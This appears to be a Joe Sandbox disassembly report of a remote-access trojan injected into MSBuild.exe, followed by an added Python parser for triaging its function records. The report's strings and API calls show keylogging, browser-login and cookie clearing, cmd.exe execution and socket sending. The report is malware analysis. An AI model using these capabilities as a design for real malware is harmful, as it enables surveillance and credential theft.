                                                                                                                        • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                        • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                                        • API String ID: 1646373207-1032071883
APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• String ID:
• API String ID: 3525466593-0
APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
APIs
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
• __alloca_probe_16.LIBCMT ref: 0044FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
• __freea.LIBCMT ref: 0044FFC4
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
• _free.LIBCMT ref: 00446F7D
• _free.LIBCMT ref: 00446FA4
• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• _free.LIBCMT ref: 0044F7B5
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044F7C7
• _free.LIBCMT ref: 0044F7D9
• _free.LIBCMT ref: 0044F7EB
• _free.LIBCMT ref: 0044F7FD
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00443305
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00443317
• _free.LIBCMT ref: 0044332A
• _free.LIBCMT ref: 0044333B
• _free.LIBCMT ref: 0044334C
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
Strings
                                                                                                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                        • String ID: (FG
                                                                                                                        • API String ID: 3142014140-2273637114
APIs
• _strpbrk.LIBCMT ref: 0044D4A8
• _free.LIBCMT ref: 0044D5C5
  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
• API String ID: 2334542088-2372832151
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
• _free.LIBCMT ref: 004427DF
• _free.LIBCMT ref: 004427E9
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
• API String ID: 2506810119-4083458154
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
• SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: EventObjectSingleWaitsend
• String ID: LAL
• API String ID: 3963590051-3302426157
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                        • String ID: bad locale name
                                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                                        • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                        • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                        • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                        • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                                        • API String ID: 587946157-3896048727
                                                                                                                        • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                        • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                        APIs
                                                                                                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                                        • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                        • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                        • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                        • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                        • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                        • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                        • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                        • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                        • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                        Strings
                                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                                        • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                        • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                        • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                        • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                        • String ID: @CG$exepath$BG
                                                                                                                        • API String ID: 4119054056-3221201242
                                                                                                                        • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                        • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                        • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                        • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                                                        • String ID: [ $ ]
                                                                                                                        • API String ID: 3309952895-93608704
                                                                                                                        • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                        • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                        • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                        • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
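A small parser for these per-function records, added here as an example and not Joe Sandbox code: it turns the APIs / Strings / Memory Dump Source / Similarity blocks into dicts so that API String IDs and fuzzy hashes can be pivoted across reports, handles the indented "Part of subcall function" lines, and keeps a partial record such as the one cut off at the end of this page. The record layout is inferred only from the lines in this report, the TAGS mapping is an assumed triage vocabulary, and SAMPLE is two records copied from this report with the Opcode ID / Instruction ID lines omitted for brevity.

```python
"""Parse Joe Sandbox IDA-plugin function records into dicts for triage.
Added example, not Joe Sandbox code; layout inferred from this report only."""
import re

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(r"^(?P<call>.+?)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<parent>[0-9A-F]{8}): (?P<rest>.+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>.+)$")
TAGS = {                                   # assumed triage labels for APIs seen in this report
    "ShellExecuteW": "launches a program through the shell",
    "UnhookWindowsHookEx": "removes a Windows hook",
    "GetLastInputInfo": "checks time since last user input",
    "RegOpenKeyExA": "reads the registry",
}


def parse_api(text):
    """'ShellExecuteW.SHELL32(00000000,open,cmd.exe), ref: 004151F4' -> dict."""
    parent = None
    m = SUBCALL_RE.match(text)             # indented 'Part of subcall function ...' lines
    if m:
        parent, text = m["parent"], m["rest"]
    m = API_RE.match(text)
    if not m:
        return None
    name, _, module = m["call"].rpartition(".")   # suffix is KERNEL32, LIBCPMT, ...
    args = m["args"].split(",") if m["args"] else []
    return {"name": name, "module": module, "args": args,
            "ref": m["ref"], "subcall_of": parent}


def parse_records(text):
    """Split the dump into records; 'Instruction Fuzzy Hash' closes a record."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if rec is None:
            rec = {"apis": [], "strings": [], "meta": {}, "similarity": {}, "yara": []}
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue                       # not a field line
        item = line[1:].strip()
        if section == "APIs":
            api = parse_api(item)
            if api:
                rec["apis"].append(api)
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                rec["strings"].append({"text": m["text"], "xrefs": m["xrefs"].split(", ")})
        elif section == "Yara matches":
            rec["yara"].append(item)
        else:                              # 'Key: value' fields
            key, _, value = item.partition(":")
            key, value = key.strip(), value.strip()
            (rec["similarity"] if section == "Similarity" else rec["meta"])[key] = value
            if key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec, section = None, None
    if rec and (rec["apis"] or rec["similarity"]):
        rec["truncated"] = True            # e.g. the cut-off last record on this page
        records.append(rec)
    return records


def tags(rec):
    """Triage tags from API names, plus one argument-aware rule."""
    out = {TAGS[a["name"]] for a in rec["apis"] if a["name"] in TAGS}
    if any(a["name"] == "ShellExecuteW" and "cmd.exe" in a["args"] for a in rec["apis"]):
        out.add("runs a command through cmd.exe")
    return out


# Two records copied from this report (abridged: Opcode ID / Instruction ID lines omitted).
SAMPLE = """\
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
• Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
• Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["similarity"]["API ID"], sorted(tags(r)))
```

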